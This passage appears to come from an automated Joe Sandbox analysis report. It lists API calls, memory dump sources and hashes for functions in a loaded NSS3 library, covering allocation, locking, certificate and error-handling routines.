Part of subcall function 6CEA8F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6CE9DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CEA8FAF
Part of subcall function 6CEA8F70: PR_Now.NSS3(?,?,00000002,?,?,?,6CE9DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CEA8FD1
Part of subcall function 6CEA8F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CE9DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CEA8FFA
Part of subcall function 6CEA8F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CE9DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CEA9013
Part of subcall function 6CEA8F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CE9DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CEA9042
Part of subcall function 6CEA8F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CE9DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CEA905A
Part of subcall function 6CEA8F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CE9DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CEA9073
Part of subcall function 6CEA8F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CE9DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CEA9111

PR_Unlock.NSS3(?,?,?,?,6CE9B266,6CEA15C6,?,?,6CEA15C6), ref: 6CE9E149

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalSection$DeleteEnterK11_UnlockValuefree$FriendlyInternalLoggedSlot
String ID:
API String ID: 4224391822-0
Opcode ID: 486af36ff82f1462089c9cb67c479c77f79215748c6be4dbdf86ab71f91c6b03
Instruction ID: 64d7af96bcc7973c4631769b7b7c5a4697e266ea343607bffd1ef5ad7ab8bc70
Opcode Fuzzy Hash: 486af36ff82f1462089c9cb67c479c77f79215748c6be4dbdf86ab71f91c6b03
Instruction Fuzzy Hash: B3516774600B01CFDB10DF29C48476ABBF0BF44309F29896CDA998BB51E731E885CB82

Function 6CEABE90 Relevance: 7.6, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6CEABF06
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CEABF56
PR_SetError.NSS3(FFFFE005,00000000,?,?,6CE89F71,?,?,00000000), ref: 6CEABF7F
CERT_DestroyCertificate.NSS3(00000000), ref: 6CEABFA9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CEAC014

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Item_Util$Zfree$CertificateDestroyEncodeError
String ID:
API String ID: 3689625208-0
Opcode ID: e47395f6c12700ee136d30a6ad826809ace63f291d5ce5a7884581e5dff9b702
Instruction ID: bf18ab93d0c69f1b2c36f4294e62e59520d6fb96d83e6d339dfd963990a5af43
Opcode Fuzzy Hash: e47395f6c12700ee136d30a6ad826809ace63f291d5ce5a7884581e5dff9b702
Instruction Fuzzy Hash: 6841C975E012099FEB00CEA5CC41BBA77B5AF4920CF354128D915DBB41FB35D946CB91

Function 6CE7EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CE7EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6CE7EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CE7EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CE7EEEB
free.MOZGLUE(?), ref: 6CE7EEF6

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 9c280ad588ec1803e899fb554f736a25859d813697620b24472c465e0afd233b
Instruction ID: 7969b4557b9bf9818d6713a24d86d6c14b26aacfa6b56c173d4af2d9f8338f0c
Opcode Fuzzy Hash: 9c280ad588ec1803e899fb554f736a25859d813697620b24472c465e0afd233b
Instruction Fuzzy Hash: 9931D671A00A01AFEB309F2CCC457A67BB4FB46318F240929E95A87B50EB31E554C7E2

Function 6CE81DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CE81E0B
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CE81E24
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE81E3B
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CE81E8A
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CE81EAD

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Error$Choice_DecodeTimeUtil
String ID:
API String ID: 1529734605-0
Opcode ID: 84385515363b1c7e8a9ceec3eb87c12c45ab447ddd18d79337aea4c046aca9c5
Instruction ID: 382c8ff7e82a370c72e8d77d15c25fb671b81585a18b31648edcd90b11356b5b
Opcode Fuzzy Hash: 84385515363b1c7e8a9ceec3eb87c12c45ab447ddd18d79337aea4c046aca9c5
Instruction Fuzzy Hash: FC21F572E05714A7E7008EE8DC40B9BB3B49B89369F244638ED6D5B781E730D90987E2

Function 6CF91E40 Relevance: 7.6, APIs: 5, Instructions: 75threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6CF91E5C

Part of subcall function 6CF49BF0: TlsGetValue.KERNEL32(?,?,?,6CF90A75), ref: 6CF49C07

PR_Lock.NSS3(00000000), ref: 6CF91E75
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CF91EAB
PR_GetCurrentThread.NSS3 ref: 6CF91ED0
PR_Unlock.NSS3(?), ref: 6CF91EE8

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CurrentThread$ErrorLockUnlockValue
String ID:
API String ID: 121300776-0
Opcode ID: dd4bbb5d43763d8ed93ea8541975430cbe6aa8e3e15fe3adb346cbfce2c65fab
Instruction ID: 4c7ab93bd87fbacaec2a1d6a9ebd5ad90f0a4db4e28f28edc3bdcb50287ff680
Opcode Fuzzy Hash: dd4bbb5d43763d8ed93ea8541975430cbe6aa8e3e15fe3adb346cbfce2c65fab
Instruction Fuzzy Hash: DB21FF75B04512ABEB50EF19D840A86B7B8FF44718B24C239D8158BB41D730F920CBC1

Function 6CEDBE60 Relevance: 7.6, APIs: 5, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CE8E708,00000000,00000000,00000004,00000000), ref: 6CEDBE6A

Part of subcall function 6CEE0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEE08B4

SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CE904DC,?), ref: 6CEDBE7E

Part of subcall function 6CEDFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CED8D2D,?,00000000,?), ref: 6CEDFB85
Part of subcall function 6CEDFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CEDFBB1

SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CEDBEC2
PR_SetError.NSS3(FFFFE006,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CE904DC,?,?), ref: 6CEDBED7
SECITEM_AllocItem_Util.NSS3(?,?,00000002,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CEDBEEB

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Item_$CopyError$AllocAlloc_ArenaFindTag_memcpy
String ID:
API String ID: 1367977078-0
Opcode ID: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction ID: 5a7c7731018974f1f8efe26149846c35e7534b5b4bf4fc69ef8b9af56a5a6cf2
Opcode Fuzzy Hash: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction Fuzzy Hash: 84110466E0430A67E7008965AC82F5B737D9B4175CF364125FE0487B52FB31F80687E2

Function 6CE8AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6CE83FFF,00000000,?,?,?,?,?,6CE81A1C,00000000,00000000), ref: 6CE8ADA7

Part of subcall function 6CEE14C0: TlsGetValue.KERNEL32 ref: 6CEE14E0
Part of subcall function 6CEE14C0: EnterCriticalSection.KERNEL32 ref: 6CEE14F5
Part of subcall function 6CEE14C0: PR_Unlock.NSS3 ref: 6CEE150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CE83FFF,00000000,?,?,?,?,?,6CE81A1C,00000000,00000000), ref: 6CE8ADB4

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6CE83FFF,?,?,?,?,6CE83FFF,00000000,?,?,?,?,?,6CE81A1C,00000000), ref: 6CE8ADD5

Part of subcall function 6CEDFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CED8D2D,?,00000000,?), ref: 6CEDFB85
Part of subcall function 6CEDFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CEDFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CFA94B0,?,?,?,?,?,?,?,?,6CE83FFF,00000000,?), ref: 6CE8ADEC

Part of subcall function 6CEDB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CFB18D0,?), ref: 6CEDB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CE83FFF), ref: 6CE8AE3C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: d46b3c3795dc85771639573b03105bf5ae80fb965bddcb339766e0bd85bdb225
Instruction ID: 7d1f12ba8015cd4dff2ad4257877104431b622705e474f9684198b3010c5be52
Opcode Fuzzy Hash: d46b3c3795dc85771639573b03105bf5ae80fb965bddcb339766e0bd85bdb225
Instruction Fuzzy Hash: 3D113872E003045BF7109B659C40BBF73F8DF9524DF24862CEC1996782FB20E99982E2

Function 6CE98FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6CEA0710), ref: 6CE98FF1
PR_CallOnce.NSS3(6CFE2158,6CE99150,00000000,?,?,?,6CE99138,?,6CEA0710), ref: 6CE99029
calloc.MOZGLUE(00000001,00000000,?,?,6CEA0710), ref: 6CE9904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6CEA0710), ref: 6CE99066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6CEA0710), ref: 6CE99078

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: fe78bb693641900eea0355d27d67d1fb2ac8ac8a8197cbe5058b4e9fe2645ab7
Instruction ID: 333389d41dc990366dd978ca0b7807ca86662b6d7c450c1cc84cfca8b8bb814b
Opcode Fuzzy Hash: fe78bb693641900eea0355d27d67d1fb2ac8ac8a8197cbe5058b4e9fe2645ab7
Instruction Fuzzy Hash: C2110821B101116BEB6016AAAC44BA637BCEB827ACF600131FD6CC6B51F797CD5593F1

Function 6CEACD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6CEC1E10: TlsGetValue.KERNEL32 ref: 6CEC1E36
Part of subcall function 6CEC1E10: EnterCriticalSection.KERNEL32(?,?,?,6CE9B1EE,2404110F,?,?), ref: 6CEC1E4B
Part of subcall function 6CEC1E10: PR_Unlock.NSS3 ref: 6CEC1E76

free.MOZGLUE(?,6CEAD079,00000000,00000001), ref: 6CEACDA5
PK11_FreeSymKey.NSS3(?,6CEAD079,00000000,00000001), ref: 6CEACDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CEAD079,00000000,00000001), ref: 6CEACDCF
DeleteCriticalSection.KERNEL32(?,6CEAD079,00000000,00000001), ref: 6CEACDE2
free.MOZGLUE(?), ref: 6CEACDE9

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 8b1ca494a29066d4e82fad7eac5b32dc70e0d2c6d7247f9c9b6c801633484f10
Instruction ID: 5efea08c64a25f8eb8be8781bfa99da697b5763812460ff792ffaaae5a01b41c
Opcode Fuzzy Hash: 8b1ca494a29066d4e82fad7eac5b32dc70e0d2c6d7247f9c9b6c801633484f10
Instruction Fuzzy Hash: E511CEB6B01211AFDB00AFA5EC84A96B77CFF0426C7244121E919CBE01E732F425C7E2

Function 6CEE3D90 Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6CEE38A2), ref: 6CEE3DB0
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6CEE38A2), ref: 6CEE3DBF

Part of subcall function 6CEE0BE0: malloc.MOZGLUE(6CED8D2D,?,00000000,?), ref: 6CEE0BF8
Part of subcall function 6CEE0BE0: TlsGetValue.KERNEL32(6CED8D2D,?,00000000,?), ref: 6CEE0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6CEE38A2), ref: 6CEE3DD9
_wstat64i32.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,000000FF,?,000000FF,00000000,00000000,6CEE38A2), ref: 6CEE3DE7
free.MOZGLUE(00000000,?,000000FF,00000000,00000000,6CEE38A2), ref: 6CEE3DF8

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValue_wstat64i32freemalloc
String ID:
API String ID: 1642359729-0
Opcode ID: 162984512dbb050b057927e1a076395ed082b2eef5f9042d03a87471f73f6d44
Instruction ID: 942a9b51a97e150e68f3ddb24c079ebd93739f3d576ba72210e7f4527ddfb1a7
Opcode Fuzzy Hash: 162984512dbb050b057927e1a076395ed082b2eef5f9042d03a87471f73f6d44
Instruction Fuzzy Hash: 7C01F2B5B052223BFB2066B56C09E3B3A7CDB466EDB240235FD28DA690EA119C0081F1

Function 6CF12CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CF15B40: PR_GetIdentitiesLayer.NSS3 ref: 6CF15B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF12CEC

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

PR_EnterMonitor.NSS3(?), ref: 6CF12D02
PR_EnterMonitor.NSS3(?), ref: 6CF12D1F
PR_ExitMonitor.NSS3(?), ref: 6CF12D42
PR_ExitMonitor.NSS3(?), ref: 6CF12D5B

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 448b6e24d7f9dac11e6fb55ebbf9e896839946fc9d799212a33f43978e7dd450
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 7501C4B1A142005BE7309F69FC40BC7B7A5FF46318F008525E85A86F21EA33F9158792

Function 6CF12D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CF15B40: PR_GetIdentitiesLayer.NSS3 ref: 6CF15B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF12D9C

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

PR_EnterMonitor.NSS3(?), ref: 6CF12DB2
PR_EnterMonitor.NSS3(?), ref: 6CF12DCF
PR_ExitMonitor.NSS3(?), ref: 6CF12DF2
PR_ExitMonitor.NSS3(?), ref: 6CF12E0B

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: aaa56ecbffbe1551f82f70db334c7deb7d2440eece936f8f1fabea9985b1825b
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 0B01C4B1A142045FEB309E69FC01BC7B7A5EF42318F004435E85A86F21DA33F9258793

Function 6CEAAE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6CE93090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CEAAE42), ref: 6CE930AA
Part of subcall function 6CE93090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CE930C7
Part of subcall function 6CE93090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CE930E5
Part of subcall function 6CE93090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE93116
Part of subcall function 6CE93090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE9312B
Part of subcall function 6CE93090: PK11_DestroyObject.NSS3(?,?), ref: 6CE93154
Part of subcall function 6CE93090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE9317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6CE899FF,?,?,?,?,?,?,?,?,?,6CE82D6B,?), ref: 6CEAAE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6CE899FF,?,?,?,?,?,?,?,?,?,6CE82D6B,?), ref: 6CEAAE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CE82D6B,?,?,00000000), ref: 6CEAAE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6CE82D6B,?,?,00000000), ref: 6CEAAE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6CE82D6B,?,?), ref: 6CEAAEA3

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

